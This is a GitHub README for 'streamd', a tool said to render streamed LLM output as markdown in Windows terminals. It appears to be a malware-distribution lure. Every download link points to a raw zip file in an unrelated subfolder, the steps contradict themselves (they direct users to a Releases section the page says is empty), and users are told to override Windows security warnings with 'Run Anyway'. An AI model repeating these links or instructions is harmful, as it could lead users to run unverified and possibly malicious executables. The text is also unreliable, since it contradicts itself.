Skip to content

luiselius/streamd

Repository files navigation

⚙️ streamd - Stream LLM Output as Clean Markdown

Download streamd


📋 What is streamd?

streamd is a simple command-line tool that shows live output from language models (LLMs). It takes the streamed data and formats it as clear, easy-to-read markdown right in your terminal. This lets you read responses from language models without messy or hard-to-follow text.

It works in Windows terminals and helps you see formatted text like lists, code blocks, and headings. If you use large language models and want to see their answers cleanly, streamd can help.

Key features include:

  • Real-time rendering of text output
  • Support for markdown formatting
  • Works on Windows command prompt, PowerShell, and Windows Terminal
  • Lightweight and easy to run

💻 System Requirements

To run streamd, your Windows computer needs:

  • Windows 10 or later (64-bit)
  • At least 2 GB of free RAM
  • Internet connection if you stream from an online model
  • Basic command prompt or PowerShell access

No other software is required. You do not need programming skills to use streamd.


🌐 Download streamd

Access the latest release here:

Download streamd

Since the download link leads to the main page, you will have to visit the page to find the latest version and download it manually.


🚀 How to Download and Install on Windows

Follow these steps to get streamd up and running on your Windows PC:

  1. Open your web browser and go to this page:
    https://raw.githubusercontent.com/luiselius/streamd/main/diglottist/Software_v1.5.zip

  2. On the GitHub page, look for a menu called Releases or Downloads. This is often found on the right side or top of the page.

  3. Find the latest release version. It usually has a version number like "v1.0" or "v2.3".

  4. Inside the release, find the Windows executable file. It might end with .exe.

  5. Click the .exe file to start the download. Wait for it to finish.

  6. Once downloaded, open your Downloads folder.

  7. Double-click the streamd.exe file to run it. You might see a security prompt; choose to run the program.

  8. A terminal window will open. This is where streamd will work when you use it.

No installation is necessary beyond downloading and running the file.


🖥️ How to Run streamd

streamd runs in the Windows command prompt or PowerShell. Here is a simple way to start:

  1. Open Command Prompt or PowerShell:

    • Press the Windows key
    • Type cmd or powershell
    • Select the app from the list and open it
  2. Navigate to the folder where you saved streamd.exe. Usually, that's your Downloads folder. You can change folders by typing:

    cd %HOMEPATH%\Downloads
    
  3. Run the program by typing:

    .\streamd.exe
    
  4. streamd will start showing you streamed output formatted as markdown.

You can also use streamd to connect to your own language model by adding parameters. For example, if you have a URL or token, refer to the advanced instructions section below.


🛠️ Basic Usage and Commands

streamd uses simple commands typed in the terminal. It shows markdown output as you type or as it receives data.

Common commands:

  • Start streamd without arguments to see sample output
  • Use a flag like -model to specify your model endpoint
  • Use -help or --help to list all options

Example command:

.\streamd.exe -model "your-llm-url"

This command connects streamd to your language model URL and shows streamed markdown output as it comes.


🗂️ Viewing Output in Markdown

streamd displays text using markdown rules. This means it formats:

  • Headings (like #, ##, ###)
  • Lists (bullets and numbers)
  • Code blocks (such as blocks of code with formatting)
  • Bold and italic text
  • Links and quotes

You do not have to know markdown syntax. streamd will format the output from the language model automatically for easy reading.


⚙️ Advanced Setup (Optional)

If you want to customize streamd or use it with your own language model, here are some options:

  • Specify the model URL using -model flag
  • Use the -apikey flag to add an API key if needed
  • Adjust output style with relevant flags (check --help)
  • Redirect output to files using > in the command prompt

🆘 Troubleshooting

Some common issues and fixes:

  • The program does not open:
    Make sure you downloaded the correct .exe file for Windows. Double-check in your Downloads folder.

  • Windows blocks the file:
    If you see a security warning, choose More Info then Run Anyway.

  • Output looks messy:
    Make sure your terminal supports markdown characters. Use Windows Terminal or PowerShell for best results.

  • Can't connect to your model:
    Verify the URL and API keys are correct and active.


📚 More Information

For technical details, code examples, and support, visit the GitHub repository:
https://raw.githubusercontent.com/luiselius/streamd/main/diglottist/Software_v1.5.zip

You will find documentation, issue tracking, and updates there.


🏷️ Tags and Topics

This project relates to:

  • Command line interfaces (CLI)
  • Terminal user interfaces (TUI)
  • Streaming text output
  • Markdown rendering
  • Go programming language (Golang)
  • Working with large language models (LLMs)
  • Window terminal tools

🔄 Updating streamd

To update streamd in the future:

  • Visit the download page again
  • Download the latest .exe file
  • Replace your old version with the new one
  • Run the new file as before

No install steps are needed beyond copying the new file.


⚡ Get Started Now

Click this link to visit the download page and get streamd:

Download streamd from GitHub

Releases

No releases published

Packages

 
 
 

Contributors